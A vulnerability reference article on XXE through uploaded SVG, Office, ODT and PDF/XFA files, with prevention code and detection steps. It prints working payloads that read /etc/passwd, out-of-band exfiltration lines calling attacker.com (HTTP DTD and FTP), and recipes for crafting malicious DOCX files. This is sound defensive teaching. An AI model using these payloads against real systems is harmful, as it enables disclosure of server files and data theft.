High

DTD Upload via File Input

CWE-611 · A05:2021 · CVSS 7.5 · 7 min

XXE via file upload (CWE-611): external entity payloads inside SVG, DOCX, XLSX, or PDF processed server-side — file disclosure without modifying HTTP headers.

File formats: SVG, DOCX, XLSX, ODT, PDF/XFA — any XML-based format processed server-side
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) — new attack surface for AI document ingestion pipelines
CVE-2025-21425 (Office customXml chain, CVSS 7.5) — document.xml hardened but customXml/*.xml still vulnerable
Apache Batik SVG renderer, Apache POI OOXML processor, LibreOffice are primary targets
Tool: OXML_XXE generates malicious DOCX/XLSX/SVG/ODT files automatically

What is File Upload XXE?

File upload XXE exploits applications that accept XML-based file formats and process them server-side with an unprotected XML parser. The attacker's payload is embedded inside the file itself — in SVG markup, inside an OOXML ZIP archive, within a PDF's XFA form data, or in an ODT document XML. The HTTP upload request looks identical to a benign file upload; all attack logic is contained in the file content.

This is one of the most prevalent XXE patterns in modern applications because file upload endpoints exist in virtually every web application: avatar uploaders, document management systems, spreadsheet importers, invoice processors, resume parsers, and content management systems. Each of these features potentially processes XML-based file formats with vulnerable parsers.

OWASP A05:2021 (Security Misconfiguration) applies because the vulnerability is a parser configuration failure: affected versions of Apache POI, Apache Batik, Apache Tika, and LibreOffice resolve external entities unless explicitly configured otherwise. CVE-2025-66516 (Apache Tika, CVSS 10.0) is the most recent critical example; it exposes PDF/XFA processing in document ingestion pipelines, including AI-powered RAG systems.

Mechanism

The attack sequence for DOCX upload:

1. The attacker starts with a valid DOCX file and unpacks it: unzip clean.docx -d malicious/
2. They inject an XXE payload into word/document.xml (or customXml/item1.xml for the CVE-2025-21425 chain).
3. They repack it: cd malicious && zip -r ../malicious.docx . && cd ..
4. They upload malicious.docx to the target application.
5. The server processes the DOCX using Apache POI (or equivalent); the XML parser encounters the DOCTYPE and resolves the entity.
6. Returned file content or an OOB callback confirms exploitation.
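
The unpack, edit, and repack steps can also be done in memory when building test fixtures for an authorized assessment. The following is a minimal sketch using only the Python standard library; the function name `replace_zip_member` is hypothetical and not part of any tool mentioned here.

```python
import io
import zipfile


def replace_zip_member(archive: bytes, member: str, new_content: bytes) -> bytes:
    """Return a copy of a ZIP archive with one member's content replaced."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        if member not in src.namelist():
            raise KeyError(f"{member} not found in archive")
        for info in src.infolist():
            # Swap in the new bytes for the target part, copy everything else.
            data = new_content if info.filename == member else src.read(info.filename)
            # Write under the same name so the package layout is unchanged.
            dst.writestr(info.filename, data)
    return out.getvalue()
```

Calling it with the bytes of clean.docx, the member name word/document.xml, and the edited XML yields the bytes of the test document, with all other parts copied in their original order.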

Attack Vectors by File Format

SVG — Apache Batik

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="100" xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="50" font-size="14">&xxe;</text>
</svg>

If Apache Batik renders this SVG to PNG, the contents of /etc/passwd appear as text in the rendered image. Recover them by downloading the generated thumbnail and reading the text (by eye or with OCR). If the rendered output is never returned to the uploader, use an out-of-band (OOB) callback instead.

<?xml version="1.0" standalone="yes"?>
<!-- OOB variant: no response reflection needed; %param1; is expected to be declared by exfil.dtd -->
<!DOCTYPE svg [
  <!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
  %sp;
  %param1;
]>
<svg xmlns="http://www.w3.org/2000/svg"/>
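
On the receiving side, both SVG payloads above depend on a DOCTYPE declaration, so an upload handler can refuse them before any renderer sees the file. The sketch below is one possible pre-check using the standard library's expat bindings, which do not fetch external entities unless a handler is installed. The names `DoctypeFound` and `reject_doctype` are hypothetical.

```python
import xml.parsers.expat


class DoctypeFound(Exception):
    """Raised when an uploaded XML document declares a DOCTYPE."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeFound if the document contains a DOCTYPE declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort as soon as the declaration is seen; nothing after it is trusted.
        raise DoctypeFound(f"DOCTYPE '{name}' declared")

    parser.StartDoctypeDeclHandler = on_doctype
    # Malformed input raises xml.parsers.expat.ExpatError, which callers
    # should also treat as a rejection.
    parser.Parse(xml_bytes, True)
```

Parsing the bytes rather than matching a regular expression lets the parser deal with the file's encoding, which a plain UTF-8 text search can miss.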

DOCX/XLSX — Apache POI

# Step 1: Unpack
unzip clean.docx -d malicious/
 
# Step 2: Inject into word/document.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- malicious/word/document.xml -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-TOKEN.oast.pro/docx-xxe">
]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
            xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>

# Step 3: Repack
cd malicious && zip -r ../malicious.docx . && cd ..

For the CVE-2025-21425 chain (Office 2024+ hardened document.xml but not customXml):

<?xml version="1.0" encoding="UTF-8"?>
<!-- malicious/customXml/item1.xml -->
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!-- Redefine an entity that the local DTD references, so the nested declarations are evaluated inside that DTD -->
  <!ENTITY % ISOamsa '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<root/>

PDF/XFA — Apache Tika (CVE-2025-66516)

Apache Tika processes XFA (XML Forms Architecture) data embedded in PDF files. Tika versions before 3.2.2 parse that XML with external entity resolution enabled. The skeleton below only builds the XFA payload; embedding it in a PDF is left to a separate tool or manual construction:

# Build the XFA payload for a PDF-based XXE test.
# Embedding it in a PDF (e.g. reportlab plus manual XFA injection) is not shown.

def create_xxe_pdf(output_path, oast_url):
    """Build the XXE payload for the XFA form; writing the PDF to output_path is not implemented."""
    xfa_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "{oast_url}/tika-xfa-xxe">
  %xxe;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform/></template></xdp:xdp>"""
    # Embed xfa_content in PDF XFA stream
    # [Tool: use tika-xxe-generator or manual PDF construction]
    return xfa_content

Check the Tika version before testing: curl -s http://tika-server/version. The endpoint returns the version as plain text rather than JSON, so no jq filter is needed.
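
For inventory scripts, the version string can be compared against the fixed release. This is a small sketch, assuming the server reports a banner such as "Apache Tika 3.2.1"; the banner format and the function name `tika_is_affected` are assumptions, and the 3.2.2 threshold is taken from the text above.

```python
import re

PATCHED = (3, 2, 2)  # first fixed release according to the text above


def tika_is_affected(version_banner: str) -> bool:
    """Return True if the banner reports a Tika version older than 3.2.2."""
    match = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", version_banner)
    if match is None:
        raise ValueError(f"no version number in {version_banner!r}")
    # A missing patch component (e.g. "3.3") is treated as 0.
    version = tuple(int(part or 0) for part in match.groups())
    return version < PATCHED
```

Comparing integer tuples avoids the string-comparison trap where "3.10.0" sorts before "3.2.2".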

ODT — LibreOffice (CVE-2025-31200)

<?xml version="1.0" encoding="UTF-8"?>
<!-- malicious/content.xml inside malicious.odt ZIP -->
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
                         xmlns:xi="http://www.w3.org/2001/XInclude">
  <office:body>
    <office:text>
      <!-- XInclude bypasses DOCTYPE filter in LibreOffice < 25.2.3 -->
      <xi:include parse="text" href="file:///etc/passwd"/>
    </office:text>
  </office:body>
</office:document-content>

Real-World Examples

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

Apache Tika is embedded in enterprise search products, SharePoint integrations, AI RAG pipelines, and document management systems. Any application that parses attacker-uploaded PDFs with a Tika version before 3.2.2 is vulnerable, however the input is opened (for example via TikaInputStream.get(file)). The attack is especially impactful in automated document pipelines where PDFs are processed without human review.

CVE-2025-21425 — Microsoft Office OOXML Parser (CVSS 7.5)

Microsoft Office 2024 hardened word/document.xml against DOCTYPE-based XXE but left customXml/*.xml files processed by a separate unprotected code path. Patched in January 2025 Patch Tuesday. The attack requires no macros — opening the DOCX triggers automatic processing.

CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)

LibreOffice blocked DOCTYPE-based XXE but did not disable XInclude processing. An ODT file with xi:include href="file:///etc/passwd" discloses the file when the document is opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7.

HackerOne #1113539 — Rockstar Games XLSX Import (High)

The researcher modified a spreadsheet template to include XXE payloads in the OOXML XML files inside the ZIP. The server-side XLSX processor (Apache POI) resolved the entities and made OOB callbacks. This is representative of the most common file upload XXE vector: server-side document processing for import/export features.

Detection

Manual Testing

1. Identify file upload endpoints that process XML-based formats: avatar upload (SVG), document import (DOCX/XLSX), invoice processing (PDF), template upload (ODT).
2. Craft a benign test file and upload it to confirm that the endpoint accepts the format.
3. Inject an OOB XXE canary into the DOCTYPE of the file's XML. Declare the parameter entity and reference it so that the parser fetches the URL:
```
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/file-upload-xxe">
  %xxe;
]>
```
4. Monitor Interactsh for callbacks after the upload.

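Use OXML_XXE (github.com/BuffaloWill/oxml_xxe) to generate test files automatically. It runs as a local web application: start it as described in the project README, choose the target format (for example DOCX), and supply http://YOUR-TOKEN.oast.pro/ as the callback URL to produce a file with an OOB XXE payload.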

For SVG: submit via every upload endpoint that accepts images, especially avatars and content thumbnails.

Automated Detection

OXML_XXE automates payload generation for DOCX, XLSX, PPTX, SVG, and ODT. Combined with an Interactsh token, it provides reliable OOB detection.

Nuclei templates cover CVE-specific file upload XXE (Tika CVE-2025-66516 template available in community templates).

BreachVex tests file-upload endpoints by generating malicious SVG, DOCX, and XLSX files with unique out-of-band callback tokens per content type, then watches for callbacks after each upload and correlates by token.
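
The per-content-type token correlation described above can be sketched in a few lines. This is an illustration of the general idea only, not BreachVex's implementation; the function names and the `oast.example` domain are hypothetical placeholders.

```python
import secrets


def issue_tokens(content_types):
    """Map a fresh random token to each content type that will be uploaded."""
    return {secrets.token_hex(8): content_type for content_type in content_types}


def callback_url(token, base_domain="oast.example"):
    """Build the callback URL to embed in the payload for one upload."""
    return f"http://{token}.{base_domain}/"


def correlate(tokens, callback_hosts):
    """Return the content types whose tokens appear in observed callback hostnames."""
    hits = set()
    for host in callback_hosts:
        # The token is the left-most DNS label of the callback hostname.
        label = host.split(".", 1)[0].lower()
        if label in tokens:
            hits.add(tokens[label])
    return hits
```

Because each format gets its own token, a single callback identifies which parser (SVG renderer, DOCX importer, XLSX importer) resolved the entity.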

Prevention

Application Level

# Python: validate file contents before processing
import io
import re
import zipfile

def validate_ooxml(file_bytes: bytes) -> None:
    """Scan OOXML ZIP for DOCTYPE/ENTITY declarations before processing."""
    # ZipFile expects a path or file-like object, so wrap the raw bytes.
    with zipfile.ZipFile(io.BytesIO(file_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith('.xml') or name.endswith('.rels'):
                content = zf.read(name).decode('utf-8', errors='replace')
                if re.search(r'<!DOCTYPE|<!ENTITY', content, re.IGNORECASE):
                    raise ValueError(f"DOCTYPE/ENTITY detected in {name}; rejected")

Library Configuration

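// Apache POI: use the SAX event model with a hardened parser
import javax.xml.parsers.SAXParserFactory;

SAXParserFactory spf = SAXParserFactory.newInstance();
// Reject any document that declares a DOCTYPE
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: no external general or parameter entities
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

// For Apache Tika: upgrade to >= 3.2.2 (CVE-2025-66516 patched)
// Tika 3.2.2 disables entity resolution in XFA parser by default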

<!-- Apache Tika: tika-config.xml to disable entity resolution -->
<properties>
  <parsers>
    <parser class="org.apache.tika.parser.xml.XMLParser">
      <params>
        <param name="parseXMLInSecurity" type="boolean">true</param>
      </params>
    </parser>
  </parsers>
</properties>

Rejecting files containing <!DOCTYPE patterns is not sufficient for LibreOffice ODT files. CVE-2025-31200 uses XInclude (xi:include) which does not use DOCTYPE. Scan for both <!DOCTYPE and xmlns:xi="http://www.w3.org/2001/XInclude" patterns, and disable XInclude at the parser level separately.
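
A pre-processing scan that covers both patterns might look like the sketch below. It assumes the upload is a ZIP-based package (OOXML or ODF) and uses the standard library's expat bindings in namespace-aware mode, so XInclude elements are found whatever prefix they use. The function name `find_risky_parts` is hypothetical, and a scan like this complements parser-level hardening rather than replacing it.

```python
import io
import zipfile
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def find_risky_parts(package: bytes) -> list:
    """Return (part name, reason) pairs for XML parts with a DOCTYPE or XInclude."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            reasons = set()
            parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

            def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
                reasons.add("DOCTYPE")

            def on_start(tag, attrs):
                # With a namespace separator, tags arrive as "namespace-uri localname".
                if tag.startswith(XINCLUDE_NS + " "):
                    reasons.add("XInclude")

            parser.StartDoctypeDeclHandler = on_doctype
            parser.StartElementHandler = on_start
            try:
                parser.Parse(zf.read(name), True)
            except xml.parsers.expat.ExpatError:
                # Unparseable parts are flagged rather than silently accepted.
                reasons.add("malformed XML")
            findings.extend((name, reason) for reason in sorted(reasons))
    return findings
```

An empty result means no part declared a DOCTYPE or used an XInclude element; any finding is grounds to reject the upload before it reaches the document processor.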

Frequently Asked Questions

What file formats are vulnerable to XXE via file upload?

Any file format based on XML is potentially vulnerable: SVG (Scalable Vector Graphics), DOCX/XLSX/PPTX (OOXML — ZIP archives containing XML files), ODT/ODS (LibreOffice OpenDocument — also ZIP+XML), PDF with XFA forms (Adobe's XML-based form format), EPUB, and SAML assertions. The attack requires the application to process the uploaded file with an XML parser that has not disabled external entity resolution.

How does DOCX/XLSX XXE work with Apache POI?

OOXML formats (DOCX, XLSX, PPTX) are ZIP archives containing XML files. The main document content is in word/document.xml (DOCX) or xl/worksheets/sheet1.xml (XLSX). Apache POI processes these XML files with a SAX or DOM parser. If that parser has entity resolution enabled, injecting <!DOCTYPE> and <!ENTITY> declarations into any of the XML files inside the ZIP triggers XXE when the file is processed server-side. CVE-2025-21425 targets the customXml/item1.xml component specifically.

Which SVG rendering libraries are vulnerable to XXE?

Apache Batik (versions < 1.14) renders SVG files server-side and processes external entities by default. Apache Batik is used in many Java enterprise applications for SVG-to-PNG/PDF conversion. ImageMagick's SVG handler (via Inkscape delegate) has historical XXE vulnerabilities. Any server-side SVG renderer that does not explicitly disable external entity processing is vulnerable.

What is the CVE-2025-21425 DOCX customXml chain?

Microsoft Office 2024+ hardened the word/document.xml parser but left customXml/*.xml files unprotected. CVE-2025-21425 (CVSS 7.5, January 2025 Patch Tuesday) exploits this: a malicious DOCX contains an XXE payload in customXml/item1.xml rather than word/document.xml. The Office parser processes customXml files with the old unprotected parser. When the victim opens the DOCX, the customXml XML triggers file disclosure (local DTD reuse pattern). No macro required.

What is CVE-2025-66516 Apache Tika PDF/XFA?

Apache Tika (< 3.2.2) processes PDF documents that embed XFA (XML Forms Architecture) forms. XFA is XML inside PDF. When Tika encounters an XFA section, it parses it with an XML parser that had external entity resolution enabled by default. A malicious PDF with an XFA form containing XXE payloads triggers arbitrary file read or SSRF when processed by any application using Tika for document ingestion. CVSS 10.0 — unauthenticated, network-reachable in many deployments.

How do I craft a malicious DOCX for XXE testing?

1. Start with a clean DOCX file.
2. Unzip it: unzip clean.docx -d malicious/
3. Edit malicious/word/document.xml (or malicious/customXml/item1.xml for the CVE-2025-21425 chain): add <!DOCTYPE> and <!ENTITY xxe SYSTEM 'http://CANARY.oast.pro/'> declarations, and embed &xxe; in the document body.
4. Rezip: cd malicious && zip -r ../malicious.docx . && cd ..
5. Upload to the target application. The server processes the DOCX and resolves the external entity.

How does SVG XXE work via avatar upload?

Avatar upload endpoints often accept SVG files to support vector graphics profiles. If the server renders the SVG to PNG/JPEG (for display) or extracts metadata using a library like Apache Batik, the SVG XML is processed. An attacker uploads a malicious SVG: <?xml version='1.0' standalone='yes'?><!DOCTYPE svg [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><svg><text>&xxe;</text></svg>. Apache Batik resolves the entity and may include the file content in the rendered image output or error message.

Can LibreOffice ODT files contain XXE payloads?

Yes — CVE-2025-31200 (CVSS 7.1) demonstrates XInclude-based file disclosure in LibreOffice ODT files. ODT is an OpenDocument format based on ZIP+XML. LibreOffice rejected DOCTYPE-based XXE but processed XInclude instructions, allowing xi:include href='file:///etc/passwd' to be embedded in the document XML. File content is included when LibreOffice opens or converts the file. Patched in LibreOffice 25.2.3 and 24.8.7.

What tools create malicious Office files for XXE testing?

OXML_XXE (github.com/BuffaloWill/oxml_xxe) — dedicated tool for generating malicious DOCX, XLSX, PPTX, ODT, and SVG files with configurable XXE payloads. It handles the ZIP unpacking, XML injection, and repacking automatically. xxeftp generates FTP-based OOB payloads. For manual crafting: unzip + edit XML + rezip is sufficient. For PDF/XFA: specialized tools or Python's reportlab with XFA injection.

What is the FTP exfiltration technique for OOXML XXE?

When OOXML XXE targets Java-based document processors (such as Apache POI), the FTP exfiltration technique works: the entity references ftp://attacker.com:2121/%file; where %file; expands to the target file content. Java's FTP client sends the URL path, and with it the file content, in FTP commands such as CWD and RETR, which the xxeftp tool captures. This technique is often more reliable than HTTP for Java-based document processors because it tolerates newlines that an HTTP URL would reject.

How do I test file upload endpoints for XXE without triggering alerts?

Use a low-noise approach: 1. Upload a valid SVG/DOCX with no XXE payload to confirm acceptance. 2. Add an internal entity canary (no external fetch): <!ENTITY test 'XXECANARY'>. 3. If the canary is reflected in any response (thumbnail URL, metadata API, processed output), entity expansion is confirmed. 4. Escalate to OOB: add a SYSTEM entity with an Interactsh token — this makes one outbound DNS/HTTP request. 5. Only attempt file read if OOB confirms the parser is vulnerable.
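
Steps 2 and 3 of this approach can be sketched as follows. The code builds an SVG whose only entity is internal, so no network request is made, and checks whether the canary shows up outside the declaration itself. The function names are hypothetical, and the local parse with the standard library is only there to show what an entity-expanding parser produces.

```python
import xml.etree.ElementTree as ET

CANARY = "XXECANARY"
SVG_NS = "http://www.w3.org/2000/svg"


def build_canary_svg(canary: str = CANARY) -> str:
    """Return an SVG that references an internal entity (no external fetch)."""
    return (
        '<?xml version="1.0" standalone="yes"?>\n'
        f'<!DOCTYPE svg [<!ENTITY test "{canary}">]>\n'
        f'<svg xmlns="{SVG_NS}" width="200" height="50">'
        '<text x="10" y="30">&test;</text></svg>'
    )


def canary_expanded(response_body: str, canary: str = CANARY) -> bool:
    """True if the canary appears somewhere other than the entity declaration."""
    declaration = f'<!ENTITY test "{canary}">'
    # A server that merely echoes the raw file back has not expanded anything.
    return canary in response_body.replace(declaration, "")


def expands_locally(svg: str) -> str:
    """Parse with the standard library to show the expanded text content."""
    root = ET.fromstring(svg)
    return root.find(f"{{{SVG_NS}}}text").text
```

Ignoring the declaration avoids a false positive when the application simply returns the uploaded file unchanged.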
